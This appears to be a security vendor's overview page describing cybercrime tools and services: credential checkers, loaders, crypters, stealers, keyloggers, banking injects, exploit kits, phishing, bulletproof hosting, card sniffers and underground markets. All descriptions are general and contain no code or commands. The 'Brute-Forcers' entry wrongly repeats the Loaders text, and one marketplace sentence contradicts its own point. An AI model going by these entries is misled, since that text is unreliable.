Threats

---

Non exhaustive list of threats

• Checkers: The Checkers (as well as Brute-Forcers see 2) try to access passwords quickly and efficiently, in order to gain access to IT applications with user rights. These checkers are available covertly for the very specific purpose of validating and accessing accounts.
  Thanks to the credentials obtained from stolen Databases, hackers can use Checkers and Brute-forcers to launch massive, automated connection attempts on websites and other available access pages, in order to verify their validity and confirm the access without authorization.
  Checkers are automated tools (scripts or software) used by cybercriminals to verify the validity and combination of the stolen username and password with the authentication system of a website, application, an application programming interface (API), etc.
  These types of attacks are facilitated if victims re-use the same login information on multiple online site platforms. The main reasons for reusing a password is to facilitate the memorization but also a low understanding of the risks involved.
• Brute-Forcers : Loaders and Crypters (see next point) allow you to bypass anti-viruses by hiding and delivering payloads.
  The term "payload" is used figuratively to designate the part of the executable code of a virus which is specifically intended to harm (as opposed to the code used by the virus to replicate). Once hackers have identified a target, the next step is to introduce the codes, such as malware, to the targeted device or system.
  Since these are generally protected by antivirus software, which can recognize, report or block the payload of the malicious application, criminals commonly use special tools such as Loaders and Crypters.
  These tools allow to escape the detections of the Endpoint security tools, enabling to download and run secretly the malicious codes or other applications. Loaders generally have limited capabilities.
• Loaders : Loaders and Crypters (see next point) allow you to bypass anti-viruses by hiding and delivering payloads. The term "payload" is used figuratively to designate the part of the executable code of a virus which is specifically intended to harm (as opposed to the code used by the virus to replicate). Once hackers have identified a target, the next step is to introduce the codes, such as malware, to the targeted device or system.
  Since these are generally protected by antivirus software, which can recognize, report or block the payload of the malicious application, criminals commonly use special tools such as Loaders and Crypters.
  These tools allow to escape the detections of the Endpoint security tools, enabling to download and run secretly the malicious codes or other applications. Loaders generally have limited capabilities.
• Crypters : The Crypters are essential services for hackers involved in the spread of malware. The Crypters are used to encrypt and hide the malicious software payloads to avoid detection by security solutions such as antivirus, for example. The Crypters can, among others, compress executables, impersonate a legitimate program and escape from being tested by sandbox techniques
  In order to assist any novice hacker who does not have the technical expertise to deploy their in-house developed malware, the developers of Crypters have developed simple intuitive graphical interfaces for the use of their Crypters. Through these configuration panels, each neophyte will be able to select the wanted options, such as the destination of the payload injection, the encryption methods, and keys.
• Stealers : The Stealers and Keyloggers are gathering information from the device of the victims, such as PII , the details of payment facilities and other sensitive data.
  The Stealers are also very popular tools for cybercriminals used to sniff sensitive information of the victims. Like the crypters they help to install malicious payloads on victims’ devices.
  The objective, on the other hand, is to collect primarily the identifiers of online services, email clients and files used by the victims. The Stealers creators provide not only the software, but also updates and a premium customer support to guarantee the features of the spyware. Very attentive, isn't it ?
• Keyloggers :A Keylogger is a kind of spyware, which records the keystrokes typed on the keyboard. Running silently in the background, one of the techniques is to save the keys in a “log” file and send them to an e-mail address or to a remote server, via FTP.
  The primary objective of the Keylogger is to start as soon as the Operating System has booted. It will use APIs to retrieve keyboard actions. Its primary objective: record, any event on the keyboard as soon as a key is pressed, and then send this information via the network.
• Injectors : An injector, targeting online banking or other type of payment platforms, is an overlay of a legitimate site but looking like the original one. It has the objective of collecting all kinds of the victim’s information attempting to visit the legitimate site. Very popular and widely available on the Dark Web, bank injections (Banking Injects) are usually used with banking Trojans for the injection of JavaScript or HTML codes before it is redirected to a legitimate bank website.
  This type of attacks is commonly called “Man in the Browser”. Any banking Trojan can modify the content of legitimate banking page in real time by performing an API Hooking. A Hooking API, in short, allows you to modify the behavior and flow of API calls, and to perform additional actions at specific times (a kind of .batch). The compromised content, added to the page, is included in a web configuration file. This is generally hosted on a remote Command and Control (CnC) server and then downloaded to the infected machine. This configuration file, encrypted and hidden to escape any detection, can quickly evolve and automatically get the configuration updates on compromised devices. Some web injections built into Trojans even allow you to take full control of the corrupted machine. The objective is to compromise both the victim's bank account and to compromise the transfers in order to directly steal the money. In addition, some web injections can easily bypass two-factor authentication. The developers of bank injectors sell on the dark marketplace both ready to go injections tools and possible targets by injectors. The average price of these types of injections tools is 250 €.
• Exploit Kits : Exploit Kits allow several Exploits to be used simultaneously in order to target various vulnerabilities of different targets. An Exploit is a piece of software which can exploit a security weakness left accessible by a person or software. The Exploit kits are automating the exploitation of vulnerabilities in web browsers, operating systems, and other applications.
  They will also be used as a container for all types of malicious payloads such as Trojan, Loader, Ransomware, and other malware.
  They can spread under the form of fake advertising, compromise files with active content or malicious link via email.
• SPAM : Spam and Phishing (see next point) are tools that allow you to reach and attract a very large number of potential victims. However, spamming and phishing (including spear phishing) are often grouped together, but these are very different techniques. There is not a single day without getting automatically generated advertising content, either in our mailbox or our favorite websites as an invitation to shop online.
  They are computer programs which search into the form fields and other interactive Web page components to rapidly popup the spam ads with creative techniques. Spamming the users usually target thousands of victims at the same time. Spams are usually about online drugstores, pornography, dating, gambling, "get rich quickly" schemes that involve topics like working from home, Hoax, etc.
• Phishing : Phishing is generally performed the same way as spamming by sending emails to large numbers of recipients.
  The technique uses legitimate identity theft. The goal of this attack is the theft of confidential information, including the transfer of money to accounts controlled by cybercriminals. The phishing emails usually pretend being banks, credit card companies, online stores, auction sites, or all types of trusted organizations.
  The purpose of the email is to encourage the victim to click on a link, for updating a password to avoid the interruption of an account or downloading an important document as an attachment.
  The attachment in the email itself redirects to a website that looks exactly like the official one, but it is the fake site finely designed to cheat the victims and invite them to leave personal information or to download malicious content. Phishing remains one of the most popular attack vectors for hackerss.
• Bulletproof Hosting : In order to extend the durability of their criminal business, hackers have opted for proxy and bulletproof hosting services.
  The Bulletproof hosting are services which guarantee the privacy of malicious players by offering protected hosting for their content. These kind of services blurs the sources and make sure that the content share cannot be prohibited by the authorities. These services often use geo-spoofing techniques to offer a wide range of IP addresses.
  The term geo-spoofing simply means hiding the real location and making the server appear elsewhere.
  Basically, it is about changing your IP address. These hosting services are usually located in countries where the regulations and laws are more permissive, not able to disturb the operations of the criminals or to incriminate them.
• Sniffers : The Sniffers, usually active on online shopping sites, gather the personal and banking details of connected customers.
  The Credit Card sniffers refer to the malicious software, usually developed in JavaScript, designed to steal data like CVV credit card numbers. CVVs, these small 3-digit codes on credit cards, allow you to make any type of online purchase.
  The technique is as follows:
  1. The hacker identifies a vulnerability of a site via a sniffer.
  2. It injects a JavaScript code which will automatically capture and collect the data of all the customers connecting to it (payment card, personal information, etc.).
  3. The sniffer then transmits the stolen data to the hacker for further exploitation.
• Database Theft : The stolen databases, sold on illegal platforms, allow hackers to access the personal information of customers or users. The goal is to access internal systems or achieve other types of fraud.
• Underground Marketplace : The emergence of these markets clearly accelerated the arrival of other players in the underground market. It is necessary to have more technical skills to do the fraud with the stolen credit card.
  Basically, the criminals can easily download a plug-in, follow the basic instructions provided by the online store, give a few hundred euros, buy a few credit cards, and start purchasing. In some cases, even the personal information of card holders can be obtained in the same shop, which further facilitates fraudulent transactions. It is as simple as watching Netflix!
  Some stores resell credentials of all kinds of stolen accounts, including banking, online stores, dating sites and any other type of account that can make fraudulent transactions online.
  Criminals use search engines to sort and classify the millions of available information by type of business, domain, or credentials. In addition, criminals can acquire the fingerprints of compromised systems to impersonate the identity of a targeted device and facilitate the evasion of the anti-fraud measures implemented by the protection tools.
  Some stores sell not only domains certificates of customers applications but also those for enterprise VPNs.
  Obviously, this is becoming highly critical, as more sophisticated cybercriminals can use employees’ credentials to access the internal systems and professional networks in order to make any kind of transactions or manipulations with the credentials of one legitimate user..

See details in the attached document: VEEZO Threats & Mitigation 2021 UK, Automation, a solution for IT security or a boon for criminals?


News

Articles to download from the net

• https://www.databreachtoday.eu/blogs/ransomware-average-ransom-payment-drops-to-137000-p-3071
• https://www.databreachtoday.eu/iot-security-dangers-loom-as-office-workers-return-a-17138
• https://www.databreachtoday.eu/mercenary-hacking-group-deploys-android-malware-a-17139
• https://www.databreachtoday.eu/south-african-port-operations-disrupted-by-cyberattack-a-17134
• https://www.bankinfosecurity.com/fbi-attackers-continue-to-exploit-unpatched-fortinet-flaws-a-16764
• https://www.databreachtoday.com/patient-files-dumped-on-darknet-site-after-hacking-incidents-a-15969
• https://www.databreachtoday.eu/chinese-apt-group-attacks-french-organizations-a-17124?highlight=true


Threats in general

Threats are on the rise, but they are not necessarily where you expect them to be. Assessing the threat is an exercise that too few governmental or private organizations practice regularly. This evaluation should be continuous and help to orientate the rules and protection measures. Because it is the threat that allows us to evaluate the risk and thus measure the effort required to implement a security system in the right proportions. However, this threat is constantly evolving, due to the unpredictable behavior of users and applications, sudden discoveries of weaknesses or vulnerabilities, the appearance of new exploit techniques and tools, unnecessary or excessive exposure, changes in motivation and the presence of hackers and criminal groups. Any effective system should be able to take the threat into account when enforcing its protective measures.